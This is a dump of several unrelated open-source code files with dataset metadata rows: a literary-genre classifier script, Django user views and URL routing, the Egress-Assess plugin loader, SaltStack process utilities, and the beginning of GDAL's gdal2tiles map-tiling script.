fn = sum((df.realclass > 0.5) & (df.logistic <= 0.5))
assert totalcount == (tp + fp + tn + fn)
allofem += totalcount
allright += (tp + tn)
return allright / allofem
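# Minimal illustration (not part of the original analysis) of the arithmetic in
# getacc(): accuracy is (true positives + true negatives) / all volumes, with 0.5
# as the decision threshold on both the real class and the logistic prediction.
def demo_accuracy():
    df = pd.DataFrame({'realclass': [1, 1, 0, 0],
                       'logistic': [0.9, 0.4, 0.2, 0.7]})
    tp = sum((df.realclass > 0.5) & (df.logistic > 0.5))
    tn = sum((df.realclass <= 0.5) & (df.logistic <= 0.5))
    # one true positive and one true negative out of four volumes -> 0.5
    return (tp + tn) / len(df.realclass)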
if __name__ == '__main__':
args = sys.argv
command = args[1]
if command == 'littlemagazines':
c_range = [.00009, .0002, .0004, .0008, .0012, .002, .004, .008, .012, 0.3, 0.8, 2]
featurestart = 1500
featureend = 4000
featurestep = 100
genre_gridsearch('/Users/tunder/Dropbox/GenreProject/python/reception/fiction/littlemagazines.csv', 'littlemagazinespost1919', c_range, featurestart, featureend, featurestep, positive_tags = ['elite'], negative_tags = ['vulgar'], excl_below = 1800, excl_above = 2000)
elif command == 'apply_quarter_century_models':
# We've previously trained models for each quarter-century
# of the fiction corpus: 1850-74, 75-99, and so on.
# Now we need to apply those models to the whole corpus
# in order to see how good their predictions are.
models = []
outpaths = []
for i in range (1850, 1950, 25):
modelpath = '../models/segment' + str(i) + '.pkl'
models.append(modelpath)
outpath = '../results/segment' + str(i) + '.applied.csv'
outpaths.append(outpath)
metadatapath = '../metadata/prestigeficmeta.csv'
for m, o in zip(models, outpaths):
applymodel(m, metadatapath, o)
elif command == 'gender_balance_fiction':
c_range = [.00009, .0002, .0004, .0008, .0012, .002, .004, .008, .012, 0.3, 0.8, 2]
featurestart = 1200
featureend = 4500
featurestep = 100
genre_gridsearch('../metadata/genderbalancedfiction.csv', 'gender_balanced_fiction', c_range, featurestart, featureend, featurestep, positive_tags = ['elite'], negative_tags = ['vulgar'], excl_below = 1800, excl_above = 2000)
elif command == 'nation_balance_fiction':
c_range = [.00009, .0002, .0004, .0008, .0012, .002, .004, .008, .012, 0.3, 0.8, 2]
featurestart = 1200
featureend = 4000
featurestep = 100
genre_gridsearch('../metadata/nationbalancedfiction.csv', 'nation_balanced_fiction', c_range, featurestart, featureend, featurestep, positive_tags = ['elite'], negative_tags = ['vulgar'], excl_below = 1800, excl_above = 2000)
| mit | 5,076,962,015,525,809,000 | 38.541899 | 275 | 0.658519 | false | 3.556784 | false | false | false |
defstryker/Hex-Omega | users/Xav/views.py | 1 | 2547 | from users.views import *
from .add_leader_form import *
from django.db.utils import IntegrityError
def create_leader_user(request, username):
form = LeaderForm()
if request.method == 'POST':
form = LeaderForm(request.POST)
if form.is_valid():
username = request.POST.get('username')
first_name = request.POST.get('first_name')
last_name = request.POST.get('last_name')
email = request.POST.get('email')
password = get_default_password()
try:
user = LeaderUser.objects.create_user(username=username, first_name=first_name, last_name=last_name,
email=email, password=password)
except IntegrityError as e:
return render(request, 'users/leaderuser_form.html',
{'form': form, 'mail_error': 'The email is not unique!'})
user.set_password(password)
mail_kickoff(user, password)
user.save()
update_session_auth_hash(request, request.user)
return redirect('display_admin', request.user.username)
return render(request, 'users/leaderuser_form.html', {'form': form})
@login_required
def display_leader_detail(request, username):
user = LeaderUser.objects.get(username__iexact=username)
return render(request, 'users/leaderdetail.html', {'user': user})
@login_required
def update_leader_detail(request, username):
user = LeaderUser.objects.get(username__iexact=username)
form_data = {'username': user.username, 'first_name': user.first_name, 'last_name': user.last_name,
'email': user.email,
'password': user.password, 'bio': user.bio}
form = UpdateLeaderForm(request.POST, initial=form_data)
if request.method == 'POST':
print(form.errors)
if form.is_valid():
user.first_name = request.POST.get('first_name')
user.last_name = request.POST.get('last_name')
user.email = request.POST.get('email')
pw = request.POST['password']
            if pw and len(pw.strip()) >= 8:
user.set_password(pw)
user.bio = request.POST.get('bio')
user.save()
update_session_auth_hash(request, request.user)
return redirect('display_leader', username)
return render(request, 'users/update_leader_form.html', {'user': user, 'form': form, 'errors': form.errors})
| mit | 4,510,525,064,045,254,000 | 41.45 | 116 | 0.599136 | false | 3.918462 | false | false | false |
jal-stats/django | jal_stats/jal_stats/urls.py | 1 | 1604 | """jal_stats URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
# from rest_framework import routers
from rest_framework_nested import routers
from stats import views as stats_views
router = routers.SimpleRouter()
# router.register(r'users', stats_views.UserViewSet)
router.register(r'activities', stats_views.ActivityViewSet)
activities_router = routers.NestedSimpleRouter(router,
r'activities',
lookup='activity')
activities_router.register(r'stats',
stats_views.StatViewSet,
base_name='activities-stats')
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^docs/', include('rest_framework_swagger.urls')),
url(r'^api/', include(router.urls)),
url(r'^api/', include(activities_router.urls)),
url(r'^api-auth/',
include('rest_framework.urls', namespace='rest_framework')),
]
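# Illustrative only: the main routes these routers generate (URL names and exact
# regexes come from DRF / drf-nested-routers defaults, so treat this as a sketch):
#   /api/activities/                          -> ActivityViewSet (list, create)
#   /api/activities/{pk}/                     -> ActivityViewSet (detail)
#   /api/activities/{activity_pk}/stats/      -> StatViewSet (list, create)
#   /api/activities/{activity_pk}/stats/{pk}/ -> StatViewSet (detail)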
| mit | 5,263,043,419,280,896,000 | 33.869565 | 77 | 0.650873 | false | 3.893204 | false | false | false |
3L3N4/Egress-Assess | common/orchestra.py | 1 | 1550 | '''
This is the conductor which controls everything
'''
import glob
import imp
from protocols.servers import *
from protocols.clients import *
from datatypes import *
class Conductor:
def __init__(self):
# Create dictionaries of supported modules
# empty until stuff loaded into them
self.client_protocols = {}
self.server_protocols = {}
self.datatypes = {}
def load_client_protocols(self, command_line_object):
for name in glob.glob('protocols/clients/*.py'):
if name.endswith(".py") and ("__init__" not in name):
                # [:-3] drops the ".py" suffix; rstrip('.py') would also strip trailing "p"/"y" chars
                loaded_client_proto = imp.load_source(name.replace("/", ".")[:-3], name)
self.client_protocols[name] = loaded_client_proto.Client(command_line_object)
return
def load_server_protocols(self, command_line_object):
for name in glob.glob('protocols/servers/*.py'):
if name.endswith(".py") and ("__init__" not in name):
                loaded_server_proto = imp.load_source(name.replace("/", ".")[:-3], name)
self.server_protocols[name] = loaded_server_proto.Server(command_line_object)
return
def load_datatypes(self, command_line_object):
for name in glob.glob('datatypes/*.py'):
if name.endswith(".py") and ("__init__" not in name):
                loaded_datatypes = imp.load_source(name.replace("/", ".")[:-3], name)
self.datatypes[name] = loaded_datatypes.Datatype(command_line_object)
return
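def example_load_all(cli_object):
    '''
    Illustrative sketch only (not called by the framework): load every protocol
    and datatype module in one pass. cli_object stands in for the parsed
    command-line options object that is normally passed to each loader.
    '''
    conductor = Conductor()
    conductor.load_client_protocols(cli_object)
    conductor.load_server_protocols(cli_object)
    conductor.load_datatypes(cli_object)
    return conductor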
| gpl-3.0 | 3,691,353,084,157,195,300 | 35.046512 | 97 | 0.610968 | false | 4.015544 | false | false | false |
smallyear/linuxLearn | salt/salt/utils/process.py | 1 | 11798 | # -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import
import os
import sys
import time
import types
import signal
import subprocess
import logging
import multiprocessing
import threading
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
    except (KeyError, IndexError):
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
    Since there isn't much use for this class as of right now, this implementation
    only supports daemonized threads and will *not* return results.
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
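def _example_thread_pool_usage():
    '''
    Illustrative sketch only, not used by salt itself: fire-and-forget a job on
    the pool. fire_async() returns False instead of blocking when the bounded
    queue is full, so callers can decide whether to drop or retry the work.
    '''
    pool = ThreadPool(num_threads=2, queue_size=10)
    return pool.fire_async(log.debug, args=('hello from the thread pool',))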
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
def add_process(self, tgt, args=None, kwargs=None):
'''
Create a processes and args + kwargs
        This will determine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
process.start()
# create a nicer name for the debug log
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}.{1}.{2}'.format(
tgt.__module__,
tgt.__class__,
tgt.__name__,
)
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
signal.signal(signal.SIGTERM, self.kill_children)
while True:
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows():
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug(('Process of pid {0} died, not a known'
' process, will not restart').format(pid))
continue
self.restart_process(pid)
else:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
        # iterate over a copy, since restart_process() mutates self._process_map
        for pid, mapping in six.iteritems(self._process_map.copy()):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for p_map in six.itervalues(self._process_map):
p_map['Process'].terminate()
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
# if anyone is done after
for pid in self._process_map:
try:
                os.kill(pid, signal.SIGKILL)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
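def _example_process_manager_usage():
    '''
    Illustrative sketch only, not used by salt itself: supervise a child process.
    run() blocks, restarting children that die, until the manager is told to stop
    (e.g. via SIGTERM); assumes a POSIX fork start method so a local target works.
    '''
    def child():
        time.sleep(10)
    manager = ProcessManager(name='ExampleProcessManager')
    manager.add_process(child)
    manager.run()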
| apache-2.0 | -4,748,247,303,098,665,000 | 31.955307 | 99 | 0.544075 | false | 4.348691 | false | false | false |
grueni75/GeoDiscoverer | Source/Platform/Target/Android/core/src/main/jni/gdal-3.2.1/swig/python/scripts/gdal2tiles.py | 1 | 134939 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ******************************************************************************
# $Id: gdal2tiles.py d712a530aa1b0dabf9717dd935996dd7b9fd8ced 2020-11-15 15:12:13 +0100 Even Rouault $
#
# Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/)
# Support: BRGM (http://www.brgm.fr)
# Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory.
# - generate Google Earth metadata (KML SuperOverlay)
# - generate simple HTML viewer based on Google Maps and OpenLayers
# - support of global tiles (Spherical Mercator) for compatibility
# with interactive web maps a la Google Maps
# Author: Klokan Petr Pridal, klokan at klokan dot cz
# Web: http://www.klokan.cz/projects/gdal2tiles/
# GUI: http://www.maptiler.org/
#
###############################################################################
# Copyright (c) 2008, Klokan Petr Pridal
# Copyright (c) 2010-2013, Even Rouault <even dot rouault at spatialys.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ******************************************************************************
from __future__ import print_function, division
import math
from multiprocessing import Pool
from functools import partial
import glob
import json
import os
import tempfile
import threading
import shutil
import sys
from uuid import uuid4
from xml.etree import ElementTree
from osgeo import gdal
from osgeo import osr
try:
from PIL import Image
import numpy
import osgeo.gdal_array as gdalarray
numpy_available = True
except ImportError:
# 'antialias' resampling is not available
numpy_available = False
__version__ = "$Id: gdal2tiles.py d712a530aa1b0dabf9717dd935996dd7b9fd8ced 2020-11-15 15:12:13 +0100 Even Rouault $"
resampling_list = (
'average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos',
'antialias', 'mode', 'max', 'min', 'med', 'q1', 'q3')
webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'mapml', 'none')
class UnsupportedTileMatrixSet(Exception):
pass
class TileMatrixSet(object):
def __init__(self):
self.identifier = None
self.srs = None
self.topleft_x = None
self.topleft_y = None
self.matrix_width = None # at zoom 0
self.matrix_height = None # at zoom 0
self.tile_size = None
self.resolution = None # at zoom 0
self.level_count = None
def GeorefCoordToTileCoord(self, x, y, z, overriden_tile_size):
res = self.resolution * self.tile_size / overriden_tile_size / (2**z)
tx = int((x - self.topleft_x) / (res * overriden_tile_size))
# In default mode, we use a bottom-y origin
ty = int((y - (self.topleft_y - self.matrix_height * self.tile_size * self.resolution)) / (res * overriden_tile_size))
return tx, ty
def ZoomForPixelSize(self, pixelSize, overriden_tile_size):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(self.level_count):
res = self.resolution * self.tile_size / overriden_tile_size / (2**i)
if pixelSize > res:
return max(0, i - 1) # We don't want to scale up
return self.level_count - 1
def PixelsToMeters(self, px, py, zoom, overriden_tile_size):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
res = self.resolution * self.tile_size / overriden_tile_size / (2**zoom)
mx = px * res + self.topleft_x
my = py * res + (self.topleft_y - self.matrix_height * self.tile_size * self.resolution)
return mx, my
def TileBounds(self, tx, ty, zoom, overriden_tile_size):
"Returns bounds of the given tile in georef coordinates"
minx, miny = self.PixelsToMeters(tx * overriden_tile_size, ty * overriden_tile_size, zoom, overriden_tile_size)
maxx, maxy = self.PixelsToMeters((tx + 1) * overriden_tile_size, (ty + 1) * overriden_tile_size, zoom, overriden_tile_size)
return (minx, miny, maxx, maxy)
@staticmethod
def parse(j):
assert 'identifier' in j
assert 'supportedCRS' in j
assert 'tileMatrix' in j
assert isinstance(j['tileMatrix'], list)
srs = osr.SpatialReference()
assert srs.SetFromUserInput(str(j['supportedCRS'])) == 0
swapaxis = srs.EPSGTreatsAsLatLong() or srs.EPSGTreatsAsNorthingEasting()
metersPerUnit = 1.0
if srs.IsProjected():
metersPerUnit = srs.GetLinearUnits()
elif srs.IsGeographic():
            metersPerUnit = srs.GetSemiMajor() * math.pi / 180
tms = TileMatrixSet()
tms.srs = srs
tms.identifier = str(j['identifier'])
for i, tileMatrix in enumerate(j['tileMatrix']):
assert 'topLeftCorner' in tileMatrix
assert isinstance(tileMatrix['topLeftCorner'], list)
topLeftCorner = tileMatrix['topLeftCorner']
assert len(topLeftCorner) == 2
assert 'scaleDenominator' in tileMatrix
assert 'tileWidth' in tileMatrix
assert 'tileHeight' in tileMatrix
topleft_x = topLeftCorner[0]
topleft_y = topLeftCorner[1]
tileWidth = tileMatrix['tileWidth']
tileHeight = tileMatrix['tileHeight']
if tileWidth != tileHeight:
raise UnsupportedTileMatrixSet('Only square tiles supported')
# Convention in OGC TileMatrixSet definition. See gcore/tilematrixset.cpp
resolution = tileMatrix['scaleDenominator'] * 0.28e-3 / metersPerUnit
if swapaxis:
topleft_x, topleft_y = topleft_y, topleft_x
if i == 0:
tms.topleft_x = topleft_x
tms.topleft_y = topleft_y
tms.resolution = resolution
tms.tile_size = tileWidth
assert 'matrixWidth' in tileMatrix
assert 'matrixHeight' in tileMatrix
tms.matrix_width = tileMatrix['matrixWidth']
tms.matrix_height = tileMatrix['matrixHeight']
else:
if topleft_x != tms.topleft_x or topleft_y != tms.topleft_y:
raise UnsupportedTileMatrixSet('All levels should have same origin')
if abs(tms.resolution / (1 << i) - resolution) > 1e-8 * resolution:
raise UnsupportedTileMatrixSet('Only resolutions varying as power-of-two supported')
if tileWidth != tms.tile_size:
raise UnsupportedTileMatrixSet('All levels should have same tile size')
tms.level_count = len(j['tileMatrix'])
return tms
tmsMap = {}
profile_list = ['mercator', 'geodetic', 'raster']
# Read additional tile matrix sets from GDAL data directory
filename = gdal.FindFile('gdal', 'tms_MapML_APSTILE.json')
if filename:
dirname = os.path.dirname(filename)
for tmsfilename in glob.glob(os.path.join(dirname, "tms_*.json")):
data = open(tmsfilename, 'rb').read()
try:
j = json.loads(data.decode('utf-8'))
except:
j = None
if j is None:
print('Cannot parse ' + tmsfilename)
continue
try:
tms = TileMatrixSet.parse(j)
except UnsupportedTileMatrixSet:
continue
except:
print('Cannot parse ' + tmsfilename)
continue
tmsMap[tms.identifier] = tms
profile_list.append(tms.identifier)
threadLocal = threading.local()
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = """
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:3857)
for Google Maps, Yahoo Maps, Bing Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by Klokan Petr Pridal on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it useful for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
MAXZOOMLEVEL = 32
class GlobalMercator(object):
r"""
TMS Global Mercator Profile
---------------------------
Functions necessary for generation of tiles in Spherical Mercator projection,
EPSG:3857.
Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps,
UK Ordnance Survey OpenSpace API, ...
and you can overlay them on top of base maps of those web mapping applications.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Mercator tiles::
LatLon <-> Meters <-> Pixels <-> Tile
WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid
lat/lon XY in meters XY pixels Z zoom XYZ from TMS
        EPSG:4326           EPSG:3857
.----. --------- -- TMS
/ \ <-> | | <-> /----/ <-> Google
\ / | | /--------/ QuadTree
----- --------- /------------/
KML, public WebMapService Web Clients TileMapService
What is the coordinate extent of Earth in EPSG:3857?
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
Constant 20037508.342789244 comes from the circumference of the Earth in meters,
which is 40 thousand kilometers, the coordinate origin is in the middle of extent.
In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857
Polar areas with abs(latitude) bigger then 85.05112878 are clipped off.
What are zoom level constants (pixels/meter) for pyramid with EPSG:3857?
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
every lower zoom level resolution is always divided by two
initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062
What is the difference between TMS and Google Maps/QuadTree tile name convention?
The tile raster itself is the same (equal extent, projection, pixel size),
there is just different identification of the same raster tile.
Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
Google placed the origin [0,0] to the top-left corner, reference is XYZ.
Microsoft is referencing tiles by a QuadTree name, defined on the website:
http://msdn2.microsoft.com/en-us/library/bb259689.aspx
The lat/lon coordinates are using WGS84 datum, yes?
Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
Well, the web clients like Google Maps are projecting those coordinates by
Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if
the were on the WGS84 ellipsoid.
From MSDN documentation:
To simplify the calculations, we use the spherical form of projection, not
the ellipsoidal form. Since the projection is used only for map display,
and not for displaying numeric coordinates, we don't need the extra precision
of an ellipsoidal projection. The spherical projection causes approximately
0.33 percent scale distortion in the Y direction, which is not visually
noticeable.
How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4?
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
All of the tools supports -t_srs 'epsg:3857'.
For other GIS programs check the exact definition of the projection:
More info at http://spatialreference.org/ref/user/google-projection/
The same projection is designated as EPSG:3857. WKT definition is in the
official EPSG database.
Proj4 Text:
+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
+k=1.0 +units=m +nadgrids=@null +no_defs
Human readable WKT format of EPSG:3857:
PROJCS["Google Maps Global Mercator",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4326"]],
PROJECTION["Mercator_1SP"],
PARAMETER["central_meridian",0],
PARAMETER["scale_factor",1],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]
"""
def __init__(self, tile_size=256):
"Initialize the TMS Global Mercator pyramid"
self.tile_size = tile_size
self.initialResolution = 2 * math.pi * 6378137 / self.tile_size
# 156543.03392804062 for tile_size 256 pixels
self.originShift = 2 * math.pi * 6378137 / 2.0
# 20037508.342789244
def LatLonToMeters(self, lat, lon):
"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857"
mx = lon * self.originShift / 180.0
my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0)
my = my * self.originShift / 180.0
return mx, my
def MetersToLatLon(self, mx, my):
"Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum"
lon = (mx / self.originShift) * 180.0
lat = (my / self.originShift) * 180.0
lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0)
return lat, lon
def PixelsToMeters(self, px, py, zoom):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
res = self.Resolution(zoom)
mx = px * res - self.originShift
my = py * res - self.originShift
return mx, my
def MetersToPixels(self, mx, my, zoom):
"Converts EPSG:3857 to pyramid pixel coordinates in given zoom level"
res = self.Resolution(zoom)
px = (mx + self.originShift) / res
py = (my + self.originShift) / res
return px, py
def PixelsToTile(self, px, py):
"Returns a tile covering region in given pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def PixelsToRaster(self, px, py, zoom):
"Move the origin of pixel coordinates to top-left corner"
mapSize = self.tile_size << zoom
return px, mapSize - py
def MetersToTile(self, mx, my, zoom):
"Returns tile for given mercator coordinates"
px, py = self.MetersToPixels(mx, my, zoom)
return self.PixelsToTile(px, py)
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in EPSG:3857 coordinates"
minx, miny = self.PixelsToMeters(tx * self.tile_size, ty * self.tile_size, zoom)
maxx, maxy = self.PixelsToMeters((tx + 1) * self.tile_size, (ty + 1) * self.tile_size, zoom)
return (minx, miny, maxx, maxy)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in latitude/longitude using WGS84 datum"
bounds = self.TileBounds(tx, ty, zoom)
minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])
return (minLat, minLon, maxLat, maxLon)
def Resolution(self, zoom):
"Resolution (meters/pixel) for given zoom level (measured at Equator)"
# return (2 * math.pi * 6378137) / (self.tile_size * 2**zoom)
return self.initialResolution / (2**zoom)
def ZoomForPixelSize(self, pixelSize):
